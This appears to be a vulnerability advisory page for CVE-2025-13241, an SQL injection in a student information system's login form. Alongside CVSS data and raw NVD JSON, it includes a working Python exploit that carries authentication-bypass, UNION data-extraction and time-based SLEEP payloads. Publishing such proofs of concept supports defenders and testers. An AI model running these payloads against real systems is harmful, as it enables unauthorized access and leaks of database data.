Security Vulnerability Report
CVE-2025-13241 CVSS 7.3 HIGH

CVE-2025-13241

Published: 2025-11-16 07:15:46
Last Modified: 2026-04-29 01:00:02

Description

A SQL injection flaw (CWE-89) has been found in code-projects Student Information System 2.0, in an unidentified portion of the file /index.php. Manipulating the Username argument leads to SQL injection. The attack can be executed remotely and, per the CVSS vector, requires neither privileges nor user interaction. A public exploit has been published and may already be in use.

CVSS Details

CVSS Score
7.3 (CVSS 3.1, VulDB secondary assessment — the headline score on this page)
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Note: the raw JSON below also carries NVD's primary CVSS 3.1 assessment, which rates this 9.8 CRITICAL (C:H/I:H/A:H), and a CVSS 4.0 vector from the same reporter that scores 5.5 MEDIUM. Use the score that matches your organisation's scoring policy rather than the headline alone.

Configurations (Affected Products)

cpe:2.3:a:fabian:student_information_system:2.0:*:*:*:*:*:*:* - VULNERABLE
code-projects Student Information System 2.0 (note the NVD CPE above attributes the product to vendor "fabian", not "code-projects"; match on either name when checking inventories)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Do not run it against systems you are not explicitly permitted to test.
python
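"""CVE-2025-13241 SQL injection PoC.

Target: code-projects Student Information System 2.0
Vulnerability: SQL injection via the ``Username`` parameter of ``/index.php``

For security research and authorized testing only.

Three checks are run: a tautology login bypass, a UNION-based information
disclosure, and a time-based (SLEEP) confirmation. Every injected response
is compared against a baseline request made with a benign username, so that
a substring such as "mysql" that already appears on the login page is not
reported as a finding.
"""
from __future__ import annotations

import sys

# Form field names exactly as the advisory names them (capitalised).
USERNAME_FIELD = "Username"
PASSWORD_FIELD = "Password"
# Per-request timeout in seconds; must exceed SLEEP_SECONDS or the
# time-based check is reported as a failed request instead of a delay.
REQUEST_TIMEOUT = 10
SLEEP_SECONDS = 5

# Tautology for authentication bypass.
PAYLOAD_BYPASS = "' OR '1'='1"
# UNION-based enumeration (MySQL). NOTE(review): assumes the login query
# selects exactly four columns -- a mismatch produces a column-count error,
# not data; adjust the NULL padding if the leak check never fires.
PAYLOAD_DB_INFO = "' UNION SELECT NULL,version(),user(),database()-- -"
# Time-based confirmation: a delayed response does not depend on page content.
PAYLOAD_TIME = (
    f"' AND (SELECT CASE WHEN (1=1) THEN SLEEP({SLEEP_SECONDS}) ELSE 0 END)-- -"
)

# Substrings that hint at a bypass / a leak. Heuristics only; they are matched
# case-insensitively and only count when absent from the baseline response.
BYPASS_MARKERS = ("dashboard",)
DB_INFO_MARKERS = ("root@", "mysql")
REDIRECT_CODES = (301, 302, 303, 307, 308)


def login_form(username: str, password: str = "any") -> dict[str, str]:
    """Return the POST body for one login attempt."""
    return {USERNAME_FIELD: username, PASSWORD_FIELD: password}


def new_markers(text: str, baseline: str, markers: tuple[str, ...]) -> list[str]:
    """Return the markers found in *text* but not in *baseline* (case-insensitive)."""
    haystack = text.lower()
    known = baseline.lower()
    return [m for m in markers if m.lower() in haystack and m.lower() not in known]


def looks_like_redirect(status_code: int) -> bool:
    """True for the HTTP redirect codes a successful login typically answers with."""
    return status_code in REDIRECT_CODES


def bypass_signal(
    status: int,
    location: str | None,
    text: str,
    base_status: int,
    base_location: str | None,
    base_text: str,
) -> bool:
    """Decide whether an injected login response indicates the login check was bypassed.

    A redirect counts only if the benign login did not redirect, or redirected
    somewhere else (a failed login often bounces back to the login page itself).
    Otherwise fall back to content markers that are new relative to the baseline.
    """
    if looks_like_redirect(status):
        if not looks_like_redirect(base_status) or location != base_location:
            return True
    return bool(new_markers(text, base_text, BYPASS_MARKERS))


def is_delayed(elapsed: float, base_elapsed: float, expected: float = SLEEP_SECONDS) -> bool:
    """True when the injected request took about *expected* seconds longer than the baseline.

    One second of tolerance absorbs network jitter; the baseline latency is
    subtracted so a slow server does not produce a false positive.
    """
    return (elapsed - base_elapsed) >= expected - 1.0


def _post_login(target: str, username: str):
    """POST one login attempt and return the response, or None after printing the error.

    Redirects are NOT followed: with ``requests``' default of following them,
    the original ``status_code == 302`` test could never observe the redirect.
    """
    import requests  # local import so the pure helpers above work without the dependency

    try:
        return requests.post(
            target,
            data=login_form(username),
            timeout=REQUEST_TIMEOUT,
            allow_redirects=False,
        )
    except requests.RequestException as exc:
        print(f"[-] Request failed: {exc}")
        return None


def exploit_sqli(target_url: str) -> dict[str, bool]:
    """Run the three SQL injection checks against *target_url*.

    Args:
        target_url: Base URL of the application; ``/index.php`` is appended.

    Returns:
        ``{"auth_bypass": bool, "db_info_leak": bool, "time_delay": bool}``.
        Progress is also printed, mirroring the original script.
    """
    target = target_url.rstrip("/") + "/index.php"
    findings = {"auth_bypass": False, "db_info_leak": False, "time_delay": False}

    print(f"[*] Targeting: {target}")
    print("[*] Vulnerability: SQL Injection in Username parameter")

    # Baseline: a benign username. Anything that shows up *only* in an injected
    # response is a far stronger signal than a bare substring match.
    print("\n[+] Test 0: Baseline request with a benign username...")
    baseline = _post_login(target, "no_such_user_cve_2025_13241")
    if baseline is None:
        print("[-] Baseline request failed; aborting.")
        return findings
    base_text = baseline.text
    base_location = baseline.headers.get("Location")
    base_elapsed = baseline.elapsed.total_seconds()

    # Test 1: tautology login bypass.
    print("\n[+] Test 1: Testing authentication bypass...")
    resp = _post_login(target, PAYLOAD_BYPASS)
    if resp is not None and bypass_signal(
        resp.status_code,
        resp.headers.get("Location"),
        resp.text,
        baseline.status_code,
        base_location,
        base_text,
    ):
        findings["auth_bypass"] = True
        print("[+] Authentication bypass successful!")

    # Test 2: UNION-based disclosure of version()/user()/database().
    print("\n[+] Test 2: Extracting database information...")
    resp = _post_login(target, PAYLOAD_DB_INFO)
    if resp is not None:
        leaked = new_markers(resp.text, base_text, DB_INFO_MARKERS)
        if leaked:
            findings["db_info_leak"] = True
            print(f"[+] Database info leaked in response! (markers: {', '.join(leaked)})")

    # Test 3: time-based confirmation, independent of page content.
    print(f"\n[+] Test 3: Time-based check (expecting ~{SLEEP_SECONDS}s delay)...")
    resp = _post_login(target, PAYLOAD_TIME)
    if resp is not None and is_delayed(resp.elapsed.total_seconds(), base_elapsed):
        findings["time_delay"] = True
        print("[+] Response was delayed: time-based SQL injection confirmed!")

    print("\n[*] Exploitation complete. Check responses for data leakage.")
    return findings


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://vulnerable-site.com")
        sys.exit(1)
    exploit_sqli(sys.argv[1])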

References

- https://code-projects.org/ (Product)
- https://github.com/asd1238525/cve/blob/main/SQL13.md (Exploit, Third Party Advisory)
- https://vuldb.com/?id.332567 (Third Party Advisory, VDB Entry)
- https://vuldb.com/?submit.687526 (Third Party Advisory, VDB Entry)
- https://vuldb.com/?ctiid.332567 (VDB Entry, permissions required)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13241", "sourceIdentifier": "[email protected]", "published": "2025-11-16T07:15:46.340", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in code-projects Student Information System 2.0. This vulnerability affects unknown code of the file /index.php. Executing manipulation of the argument Username can lead to sql injection. The attack can be executed remotely. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:fabian:student_information_system:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "0D434445-9D99-4366-A2BE-D2420F5855C2"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/asd1238525/cve/blob/main/SQL13.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332567", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332567", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.687526", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}